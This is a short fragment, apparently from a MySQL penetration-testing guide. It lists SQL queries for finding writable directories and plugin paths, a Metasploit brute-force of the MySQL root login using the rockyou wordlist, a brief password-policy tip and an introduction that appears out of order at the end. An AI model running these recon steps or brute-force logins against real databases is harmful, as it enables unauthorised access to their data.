-- Find writable directories
SHOW VARIABLES LIKE 'secure_file_priv';  -- NULL = no file ops, "" = any dir
SHOW VARIABLES LIKE 'datadir';
SHOW VARIABLES LIKE 'plugin_dir';
use auxiliary/scanner/mysql/mysql_login
set RHOSTS <target_ip>
set USERNAME root
set PASS_FILE /usr/share/wordlists/rockyou.txt
run
Enforce strong password policies and consider using external authentication plugins.
MySQL is one of the world's most popular relational database management systems (RDBMS). Powering millions of applications, from small WordPress blogs to massive enterprise systems, it is a prime target for attackers. Once an attacker gains access to a MySQL instance, the entire application's data integrity, confidentiality, and availability are at risk.